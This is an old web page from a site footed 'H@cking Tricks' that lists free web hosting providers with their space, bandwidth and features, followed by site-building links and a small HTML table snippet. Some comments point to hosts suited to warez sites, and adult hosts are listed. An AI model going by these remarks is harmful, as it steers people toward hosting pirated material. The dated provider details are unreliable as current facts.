Summary: 50 MB Web Space,<font color=#3A4F6C><font color=#3A4F6C><b> WWW Board,</font></b></font> Guest Book, Form Mail, WYSIWYG Web Editor,
Excellent Support, and more.

Provider: Neopages
Service: 50 Mb space
URL:http://www.neopages.net/
Summary: 50 Mb space, Unlimited bandwidth, POP E-Mail, True FTP Accounts ,
Site Admin Control Panel,

Provider: Internations Global Web Services
Service: 100 Mb space
URL:http://www.internations.net/
Summary: 100 Mb space, 1 GB bandwith, Web Message board, Guestbook,
FormMail script and more.

Provider: I12
Service: 800 Mb space
URL:http://www.i12.com/
Summary: 800 Mb space, unlimited POP3 and alias email addresses,
definetly a site to check out!

Provider: Nerd Cities
Service: 100 Mb space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.nerdcities.com/</font></b></font>
Summary:100 Megabytes Web Space, GuestBook+Counters, Full Technical Support,
Unlimited File Size Web Control Panel, No Bandwidth Limits And more!

Provider: DK3
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.dk3.com</font></b></font>
Max file size: 400KB (I agree this sucks)
Comments: The following things are supported, FTP, MySQL, PHP, Perl, SSI, WAP. Plus pre-made portal and forum are available free.

http://www.freeweb-hosting.com/
-You have UNLIMITED disk space and bandwidth with your site!.
-You can only upload files with .html, .htm, .jpg, .gif, .css, .js, .png, .pdf
file name extensions.
-Size of every file could not large than 85K bytes.

http://www.zoomfast.com/
->How much space do I get?
-Unlimited
->How can I upload my files?
-We offer full FTP access. The best FTP client can be found here.
->Can I use PHP or CGI?
-No.
->Can I host movies?
-No.
->Can I have my pages in non-english language?
-No.
->What is the maximum number of files?
-Unlimited.
->What is the maximum file size?
-80KB

->http://www.yoogo.com/
site for sale

->http://www.worldzone.net
Worldzone Free - 50mb space, allowed file types (au, mid, midi, wav, gif, ico, jpg, jpeg, png, htm, html, shtml, wml, xml, css, class, jar, java, dat, txt, tmpl, htaccess, htpasswd, js, map, swf, ttf). Sorry but no cgi, ftp, MySQL on our Free accounts. 1 468x60 banner will be located on the bottom of your page but can be removed in our $12 yearly Plus Package.

->http://www.web1000.com/
50 mb space

->http://www.tripod.com
20 MB of disk space – Have room for your image files, MP3s, video clips.
1 GB of Monthly Bandwidth – More people can visit your site more often

-><font color=#3A4F6C><font color=#3A4F6C><b> http://www.simplycities.com</font></b></font>
page don't load

->http://www.qwikpages.com
now it's freecoolpages.com
10MB OF DISK SPACE
UNLIMITED BANDWIDTH
FTP ACCESS FOR UPLOADING
FREE EMAIL

->http://www.netomia.com
60 mb of space!
Your website may not contain or refer to sites with the following content: Porn, warez, hack or anything encouraging any kind of illegal activities or racism.

->www.netcolony.com
25 megs of webspace
Easy homepage creator
Unlimited bandwidth
Your own messageboard
Templates
Free Guestbook
Advanced editor
No fees - 100% FREE!
Fast servers

Provider:POHost
Service: Unlimited Disk Space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.pohost.com/</font></b></font>
Summary: Unlimited disk space, Unlimited transfers, Fast servers,Real FTP Uploads,
Domain name hosting TGP Compliant, and more.

Provider:Free Web Hosting
Service: Unlimited Disk space
URL:http://www.freeweb-hosting.com/
Summary:Unlimited disk space,Unlimited transfers, FAST Servers ,Domain Hosting,
24/7 Real FTP Access,Friendly Support, Web Email, FREE Web Promotion.

Provider: Zoom Fast
Service: Unlimited Space
URL:http://www.zoomfast.com/
Summary: Unlimited space,Unlimited bandwith, High speed servers and more

URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.yoogo.com</font></b></font>
Summary: Offering a great 50 MB of space plus other features like Email Forms, Guestbooks and even Message Boards. Funny name I'm sure you will agree yet worth a look because of the nice amount of space!

Provider: Worldzone.net
Service: 100 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.worldzone.net</font></b></font>
Summary: Offering a fantasic 100 MB why not give them a go! They do not accept Warze & Porn sites so dont try to host your page here if you plan to run such a page. However, because of the amount of space they are offering then would make for a great place to dump your files!

Provider: WebJump
Service: 25 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.webjump.com</font></b></font>
Summary: WebJump is another Small Business Provider offer a huge 25 MB for your website and unlimited bandwidth! Unlike B-City.com WebJump support the use of FTP Updates along with the use of Flash, JavaScript, WAV Files and other things as well. If you like using Email please note WebJump at this time do not offer either POP or Web Based Email Services

Provider: Web1000
Service: 25 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.web1000.com</font></b></font>
Summary: N/A

Provider: Tripod
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.tripod.com</font></b></font>
Summary: N/A

Provider: Spree.com
Service: Unlimited Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.spree.com</font></b></font>
Summary: Offering counters, builders, uploaders, HTML guide and a unlimited MB account spree.com could be a great place for junk files. If your running a Warze related website, try these guys out and tell me what you think!

Provider: SimplyCities
Service: 30 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.simplycities.com</font></b></font>
Summary: Simplycities.com have just had a change in servers hence speed should be and better be at an all time high. On the website they claim to offer Unlimited Bandwidth yet at the end of that they have a little * displaying the fact conditions apply yet we could not find on the page details of this!?! Anyway they could be worth a look if just starting out!

Provider: Server2000.at
Service: Unlimited Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.server2000.at</font></b></font>
Summary: Only problem with this is it's not english.

Provider: Qwik Pages
Service: 100 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.qwikpages.com</font></b></font>
Summary: N/A

Provider: Netomia
Service: 60 MB Webspace, Online Editor, Counter, Form Mail, Guestbook
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.netomia.com</font></b></font>
Summary: One of the few providers offering such huge space limits with a string of other great features need for any good website!

Provider: JustFree.com
Service: 40 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.justfree.com</font></b></font>
Summary: Offering 40 MB and no bandwidth limit this should be a good choice in web hosting. They also offer free forums, live support, free guestbook & soon Free Email! We have been unable to test this provider 100% hence comments are welcome!

Provider: InfoCache
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.infocache.com</font></b></font>
Summary: InfoCache offers a fantastic 50 MB of webspace which is great for any small business or personal website. They are now begining to offer Free Email and also offer a range of "pay" service which are very cheap compared to some providers. Worth a look just for the space!

Provider: FreeHomePages
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.freehomepages.com</font></b></font>
Summary: They claim fast and stable server with offers of chat, form mailer, guestbooks, page builders, unlimited bandwith & unlimited hits to get the visitors in and when they offer this much space why not go for them!

Provider: Dynahost.net
Service: 25 MB Webspace [ 100 MB After Approval ]
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.dynahost.net</font></b></font>
Summary: Providing a nice amount of space with the option of increasing to 100 MB unlike most providers. Dynahost accounts also come with forums & a guestbook which is all updated able via your Web Browser!

Provider: Dreamwater
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.dreamwater.com</font></b></font>
Summary: Offer 50 MB, Guestbook, Chat, Form Mailer, Web Templates, Builder, Clip Art, Search Submissions, Subdomain & Short URL, Unlimited Band * no hit limit! Because they offer so much we think they could have a large number of member hence a slow service yet you should test them for yourself

Provider: Dencity
Service: 25 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.dencity.com</font></b></font>
Summary: Dencity is a well known provider offering a great 25 MB which is fantastic for any small user. They also offer a range of tools for its members plus a listing of HTML Code to help you along!

Provider: Atmosphere.be
Service: Webspace [Unlimited?] & 5 MB Email
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.atmosphere.be</font></b></font>
Summary: No Information

Provider: AFreeHome.com
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.afreehome.com</font></b></font>
Summary: AFreeHome.com make out (in a round-about way) they hate Geocities.com! With the huge space they offer and no bandwidth limit they could be one of the best providers to date! They also claim to pay you US$10 for people you get to Sign Up yet this seems a little funny we think. Anyway - try them and inform us of how good/bad they are.

Provider: Above World
Service: 25 MB Webspace [Possible 60 MB of space]
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.aboveworld.com</font></b></font>
Summary: Above World claim to offer a 100% Free Virtual Domain along with 25 MB of webspace plus chat board and guestbook! When checking the above details on the Above World Website they listed via text they offer 25 MB yet a visible banner said 60 MB. We can provide no further information.

Provider: 50megs
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.50megs.com</font></b></font>
Summary: 50megs.com is only one of a few providers offering such huge amounts of webspace for free. It comes with other services like Web Polls, counters and much more.

Provider: 00server
Service: 20 MB Webspace [Short URL Provided]
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.00server.com</font></b></font>
Summary: 00server offers a wide range of domains to suite most styles of websites. Along with the short domain names you get a fantastic 20 MB for your website. Known for its fast service yet the banner is always a down side to any provider!

Provider: 1and1
Service: 500 MB web space
5,000 MB/month traffic ($.99 per GB for additional traffic)
site statistics, log files, ready-to-run CGI-library, own CGI programming (Perl, Python), FrontPage 2002 extensions
Advanced Password Protection
5 FTP accounts
PHP3 & PHP4 MySQL
Proxy SSL Secure Server
Cron Jobs
SSH Secure Shell Access
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://order.1and1.com/</font></b></font>
Periodical time limited offers

PunoSoft Mail:
http://www.punosoft.com:32000/mail
-You can check email via website, OR I can give you the details on how to configure Outlook or Outlook Express for mail retrieval/send.
PunoSoft Gallery:
http://www.punosoft.com/gallery
-Great for sharing photos or "Signatures".
-Sign Up and I'll send you details on how to upload your photos and how to access them.

PunoSoft Web Host:

http://www.punosoft.com/webhost

125MB Hosting Service - http://www.125mb.com

XAXAX FREE HOSTING - http://free.xaxax.com

FREE HOSTiNG @ HOSTARS - http://hostars.com

CyberFreeHost - http://www.cyberfreehost.com

ULTRA FREE HOST - http://www.ultrafreehost.com

20forfree.com :: Free Web Hosting - http://www.20forfree.com

HentaiRack.com :: FREE HEntai Web Hosting - http://www.hentairack.com

EZ SEX HOST Free Adult Hosting - http://www.ezsexhost.com
































how to make a new web site
http://www.make-a-web-site.com/
http://www.pagetutor.com/pagetutor/makapage/index.html
www.webmonkey.com

Colour Palletes
http://colormatch.dk

HTMLlock <---Need

http://www.devside.net
http://www.devside.net/download/crypto/disclaimer1.html

well, if you want text seperate from image, you could just do this:


<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<td><td>

your text here, it's totally fun, yeah yeah yeah

</td><td>

<img src="your picture here">

</td></tr>
</table>



if you want to have the image on the left side, and text on the right side, just reverse the code like so:


<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<td valign="bottom" align="left">

<img src="your picture here">

</td>

<td><td>

your text here, it's totally fun, yeah yeah yeah

</td></tr>
</table>

 

Copyright @ 2013 H@cking Tricks.